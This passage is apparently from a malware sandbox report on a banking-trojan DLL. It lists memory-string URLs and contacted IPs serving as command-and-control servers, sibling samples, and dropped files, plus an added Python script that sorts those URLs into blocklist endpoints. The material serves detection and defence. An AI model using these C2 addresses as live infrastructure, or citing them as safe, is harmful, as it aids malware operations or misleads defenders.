  Source: loaddll32.exe, 00000000.00000003.609859133.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/soft
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.542004971.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/ll8b
  Source: loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/GlobalSign
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://143.244.140.214:808/la
  Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/14
  Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://145.56.219.47:8116/
  Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/ll
  Source: loaddll32.exe, 00000000.00000003.408320387.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214/
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://192.46.210.220/jl
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/My
  Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://143.244.140.214:808/frthe.computer
  Source: loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/4.140.214:808/hy
  Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47/
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://185.56.219.47:8116/4&b
  Source: loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/l3
  Source: loaddll32.exe, 00000000.00000003.583869390.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/.140.214:808/hy
  Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/El
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/h
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/al
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/b
  Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/(u1
  Source: rundll32.exe, 00000004.00000002.773821588.0000000000FCC000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/k
  Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/em32
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/l
  Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://143.244.140.214:808/g_
  Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/R
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/Yl
  Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/O
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/graphy
  Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://143.244.140.214:808/
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575651265.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://185.56.219.47:8116/h
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/4l
  Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/Nl
  Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://45.77.0.96:6891/0
  Source: loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/2
  Source: loaddll32.exe, 00000000.00000003.457343535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/0
  Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/en-US
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/Sg
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Antivirus Detection: - | Reputation: unknown
https://192.46.210.220/k
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://19.77.0.96:6891/
  Source: loaddll32.exe, 00000000.00000002.780745160.00000000033C0000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/ography
  Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://185.56.219.47:8116/4.140.214:808/h
  Source: loaddll32.exe, 00000000.00000003.668641353.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/=l
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/f
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/Ps%
  Source: loaddll32.exe, 00000000.00000003.700253725.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/Microsoft
  Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://192.46.210.220/sl
  Source: loaddll32.exe, 00000000.00000003.575651265.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
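The two URL tables above (the reputation table and the memory-strings table) list more than seventy "URLs", but only four hosts are ever contacted. The path fragments (/Certification, /GlobalSign, /Microsoft, /graphy, /em32, /en-US) read like neighbouring strings in the dump rather than request paths, and three hosts (195.56.219.47, 145.56.219.47, 19.77.0.96) differ from a real C2 address by one octet, which is what partially overwritten string buffers look like. The script below is an added example, not the report's or Joe Sandbox's own code: it collapses a subset of the memory-strings table (embedded as constructed input) to host:port endpoints, confirms them against the Contacted IPs table, and separates the one-octet mutations so they are not shipped as indicators. That the path fragments are extraction noise is an assumption a practitioner should check against the PCAP before relying on it.

```python
"""Collapse the sandbox's URL tables to the endpoints that matter.

Added example; not the report's or Joe Sandbox's own code. URL_STRINGS is
a subset of this report's 'URLs from Memory and Binaries' table, embedded
as constructed input so the script runs offline; CONFIRMED_HOSTS comes
from the report's Contacted IPs table.
"""
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

Endpoint = Tuple[str, int]

# Hosts the sandbox actually saw traffic to (Contacted IPs table).
CONFIRMED_HOSTS = {"45.77.0.96", "185.56.219.47", "192.46.210.220", "143.244.140.214"}

# Subset of the report's memory-string URLs, copied as they appear.
URL_STRINGS = [
    "https://143.244.140.214:808/hy",
    "https://195.56.219.47:8116/",
    "https://185.56.219.47/Wl",
    "https://192.46.210.220/aenh.dll",
    "https://45.77.0.96:6891/sg",
    "https://185.56.219.47:8116/oft",
    "https://192.46.210.220/Certification",
    "https://145.56.219.47:8116/",
    "https://19.77.0.96:6891/",
    "https://143.244.140.214:808/frthe.computer",
    "https://45.77.0.96:6891/Microsoft",
]


def endpoint(url: str) -> Endpoint:
    """(host, port) for a URL; the port defaults from the scheme."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.hostname or "", port


def one_octet_off(a: str, b: str) -> bool:
    """True when two dotted-quad strings differ in exactly one octet."""
    oa, ob = a.split("."), b.split(".")
    return len(oa) == len(ob) == 4 and sum(x != y for x, y in zip(oa, ob)) == 1


def classify(urls: List[str]):
    """Group URLs by endpoint and split them into three buckets:
    confirmed  - host appears in the Contacted IPs table
    artefacts  - host is a one-octet mutation of a confirmed host
                 (assumed to be a partially overwritten string, not
                 separate infrastructure)
    unknown    - anything else, which deserves a manual look
    Path components are deliberately ignored: grouping is by host:port,
    so /Certification and /aenh.dll collapse onto the same endpoint.
    """
    by_endpoint: Dict[Endpoint, List[str]] = defaultdict(list)
    for u in urls:
        by_endpoint[endpoint(u)].append(u)

    confirmed: Dict[Endpoint, List[str]] = {}
    artefacts: Dict[Endpoint, List[str]] = {}
    unknown: Dict[Endpoint, List[str]] = {}
    for (host, port), members in by_endpoint.items():
        if host in CONFIRMED_HOSTS:
            confirmed[(host, port)] = members
            continue
        near = sorted(c for c in CONFIRMED_HOSTS if one_octet_off(host, c))
        if near:
            artefacts[(host, port)] = near
        else:
            unknown[(host, port)] = members
    return confirmed, artefacts, unknown


if __name__ == "__main__":
    confirmed, artefacts, unknown = classify(URL_STRINGS)
    for ep, members in sorted(confirmed.items()):
        print("C2   %s:%d  (%d strings)" % (ep[0], ep[1], len(members)))
    for ep, near in sorted(artefacts.items()):
        print("DUMP %s:%d  one octet off %s" % (ep[0], ep[1], ", ".join(near)))
    for ep in sorted(unknown):
        print("???  %s:%d" % ep)
```

Grouping by host:port rather than by full URL also surfaces that 185.56.219.47 appears both with the port the bot used (8116) and with the scheme default (443, from the strings without an explicit port); only the former is backed by the report's connection data, so the endpoint list, not the host list, is what belongs in a blocklist.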

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.77.0.96 | unknown | United States | 20473 | AS-CHOOPAUS | true
185.56.219.47 | unknown | Italy | 202675 | KELIWEBIT | true
192.46.210.220 | unknown | United States | 5501 | FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe | true
143.244.140.214 | unknown | United States | 174 | COGENT-174US | true

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:510680
                        Start date:28.10.2021
                        Start time:04:42:55
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 39s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:SecuriteInfo.com.Variant.Razy.980776.4470.28989 (renamed file extension from 28989 to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:37
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal76.bank.troj.evad.winDLL@11/2@0/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 13.6% (good quality ratio 13.6%)
                        • Quality average: 78.8%
                        • Quality standard deviation: 15.7%
                        HCA Information:
                        • Successful, ratio: 65%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 173.222.108.210, 173.222.108.226, 20.50.102.62, 80.67.82.235, 80.67.82.211, 40.112.88.60, 20.54.110.249, 40.91.112.76, 20.190.160.75, 20.190.160.67, 20.190.160.129, 20.190.160.132, 20.190.160.71, 20.190.160.8, 20.190.160.136, 20.190.160.4, 51.11.168.232
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/510680/sample/SecuriteInfo.com.Variant.Razy.980776.4470.dll

                        Simulations

                        Behavior and APIs

Time      Type             Description
04:45:01  API Interceptor  176x Sleep call for process: rundll32.exe modified
04:45:07  API Interceptor  170x Sleep call for process: loaddll32.exe modified

                        Joe Sandbox View / Context

                        IPs

Match: 45.77.0.96
  Associated Sample Name / URL                                    Detection
  SecuriteInfo.com.Variant.Razy.980776.14159.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.20807.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.27063.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.2260.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.12452.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.6851.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.2379.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.10617.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.24814.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.29553.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.15127.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.28360.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.19796.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.9816.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.17887.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.9354.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.302.dll                    malicious
  SecuriteInfo.com.Variant.Razy.980776.25001.dll                  malicious
  SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dll   malicious
  SecuriteInfo.com.Trojan.Win32.Sabsik.FL.Bml.25404.dll           malicious

Match: 185.56.219.47
  Associated Sample Name / URL                                    Detection
  SecuriteInfo.com.Variant.Razy.980776.14159.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.20807.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.27063.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.2260.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.12452.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.6851.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.2379.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.10617.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.24814.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.29553.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.15127.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.28360.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.19796.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.9816.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.17887.dll                  malicious
  SecuriteInfo.com.Variant.Razy.980776.9354.dll                   malicious
  SecuriteInfo.com.Variant.Razy.980776.302.dll                    malicious
  SecuriteInfo.com.Variant.Razy.980776.25001.dll                  malicious
  SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dll   malicious
  SecuriteInfo.com.Trojan.Win32.Sabsik.FL.Bml.25404.dll           malicious

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

Match: KELIWEBIT
  Associated Sample Name / URL                                    Detection   Context
  SecuriteInfo.com.Variant.Razy.980776.14159.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.20807.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.27063.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.2260.dll                   malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.12452.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.6851.dll                   malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.2379.dll                   malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.10617.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.24814.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.29553.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.15127.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.28360.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.19796.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.9816.dll                   malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.17887.dll                  malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.9354.dll                   malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.302.dll                    malicious   185.56.219.47
  SecuriteInfo.com.Variant.Razy.980776.25001.dll                  malicious   185.56.219.47
  SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dll   malicious   185.56.219.47
  SecuriteInfo.com.Trojan.Win32.Sabsik.FL.Bml.25404.dll           malicious   185.56.219.47

Match: AS-CHOOPAUS
  Associated Sample Name / URL                                    Detection   Context
  SecuriteInfo.com.Variant.Razy.980776.14159.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.20807.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.27063.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.2260.dll                   malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.12452.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.6851.dll                   malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.2379.dll                   malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.10617.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.24814.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.29553.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.15127.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.28360.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.19796.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.9816.dll                   malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.17887.dll                  malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.9354.dll                   malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.302.dll                    malicious   45.77.0.96
  SecuriteInfo.com.Variant.Razy.980776.25001.dll                  malicious   45.77.0.96
  ExtractedB64-B64Decoded.exe                                     malicious   144.202.13.247
  SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dll   malicious   45.77.0.96

                                                                                                        JA3 Fingerprints

Match: 51c64c77e60f3980eea90869b68c58a8
  Associated Sample Name / URL                                    Detection   Context
  SecuriteInfo.com.Variant.Razy.980776.14159.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.20807.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.27063.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.2260.dll                   malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.12452.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.6851.dll                   malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.2379.dll                   malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.10617.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.24814.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.29553.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.15127.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.28360.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.19796.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.9816.dll                   malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.17887.dll                  malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.9354.dll                   malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.302.dll                    malicious   192.46.210.220
  SecuriteInfo.com.Variant.Razy.980776.25001.dll                  malicious   192.46.210.220
  SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dll   malicious   192.46.210.220
  SecuriteInfo.com.Trojan.Win32.Sabsik.FL.Bml.25404.dll           malicious   192.46.210.220

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: Microsoft Cabinet archive data, 61157 bytes, 1 file
Category: dropped
Size (bytes): 61157
Entropy (8bit): 7.995991509218449
Encrypted: true
SSDEEP: 1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
MD5: AB5C36D10261C173C5896F3478CDC6B7
SHA1: 87AC53810AD125663519E944BC87DED3979CBEE4
SHA-256: F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
SHA-512: E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                        Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: data
Category: modified
Size (bytes): 326
Entropy (8bit): 3.099972864116614
Encrypted: false
SSDEEP: 6:kKtdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:D2kPlE99SNxAhUefit
MD5: 966943C4EFC9B33FA6A589D20860BFED
SHA1: CCBF51C58D7595A2C30F9509082A137FA4654E4C
SHA-256: A2B60F77A369F087EAE2C13434C2791227E59F2B7491FFFCA4B3A2F3E544D2B1
SHA-512: D77D5CCA47A23F462F8325A07AA3C81CB35B088F4DA06F421249F8A6899FE2DEB03BD478101C1B7A76F4313F925FD9CB6186FE68D68D620654EF2501EAA77D9E
Malicious: false
Reputation: low
Preview: p...... ..........i.....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.439741617771986
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
